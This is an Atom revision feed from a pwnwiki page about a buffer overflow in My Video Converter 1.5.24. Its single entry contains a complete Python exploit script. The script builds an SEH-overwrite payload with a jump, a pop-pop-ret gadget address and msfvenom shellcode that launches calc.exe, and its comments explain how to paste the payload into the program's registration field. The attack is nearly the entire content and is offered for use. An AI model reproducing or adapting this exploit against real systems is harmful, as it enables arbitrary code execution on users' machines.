<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=My_Video_Converter_1.5.24_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>My Video Converter 1.5.24 緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=My_Video_Converter_1.5.24_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=My_Video_Converter_1.5.24_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-21T05:36:16Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=My_Video_Converter_1.5.24_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1515&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/env python  # Exploit Title     : My Video Converter 1.5.24 - Remote Buffer Overflow   # Discovery by      : Shubham Singh # Known As          : Spiri...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=My_Video_Converter_1.5.24_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1515&amp;oldid=prev"/>
		<updated>2021-04-11T01:28:51Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/env python  # Exploit Title     : My Video Converter 1.5.24 - Remote Buffer Overflow   # Discovery by      : Shubham Singh # Known As          : Spiri...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
&lt;br /&gt;
# Exploit Title     : My Video Converter 1.5.24 - Remote Buffer Overflow  &lt;br /&gt;
# Discovery by      : Shubham Singh&lt;br /&gt;
# Known As          : Spirited Wolf [Twitter: @Pwsecspirit]&lt;br /&gt;
# Email             : spiritedwolf@protonmail.com&lt;br /&gt;
# Youtube Channel   : www.youtube.com/c/Pentestingwithspirit &lt;br /&gt;
# Discovey Date     : 29/07/2018&lt;br /&gt;
# Software Link     : http://www.divxtodvd.net/my_video_converter.exe&lt;br /&gt;
# Tested Version    : 1.5.24&lt;br /&gt;
# Tested on OS      : Windows XP Service Pack 3 x86&lt;br /&gt;
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name &amp;quot;exploit.txt&amp;quot;.&lt;br /&gt;
#                     Just copy the text inside &amp;quot;exploit.txt&amp;quot; and start the My Video Converter 1.5.24 program and click on &amp;quot;Register&amp;quot;.&lt;br /&gt;
#                     In the third field i.e &amp;quot;Enter User Name&amp;quot; paste the content of &amp;quot;exploit.txt&amp;quot; and click on &amp;quot;OK&amp;quot;. You will see a sweet calculator poped up.&lt;br /&gt;
# Greetz            :  @FuzzySec @LiveOverflow @hexachordanu&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 996&lt;br /&gt;
#Short Jump address&lt;br /&gt;
nseh = &amp;quot;\xeb\x10\x90\x90&amp;quot; &lt;br /&gt;
#0x1002434b : pop ebp # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\My Video Converter\SkinMagic.dll)&lt;br /&gt;
seh= &amp;quot;\x4B\x43\x02\x10&amp;quot; &lt;br /&gt;
nops = &amp;quot;\x90&amp;quot; * 16&lt;br /&gt;
&lt;br /&gt;
#badchar \x00\x0a\x0d&lt;br /&gt;
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python&lt;br /&gt;
buf =  &amp;quot;&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba&amp;quot;&lt;br /&gt;
exploit = buffer + nseh + seh + nops + buf + &amp;quot;C&amp;quot; * (1000 - len(buffer) - 8 - len(nops) - len(buf))&lt;br /&gt;
f = open (&amp;quot;exploit.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(exploit)&lt;br /&gt;
f.close()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>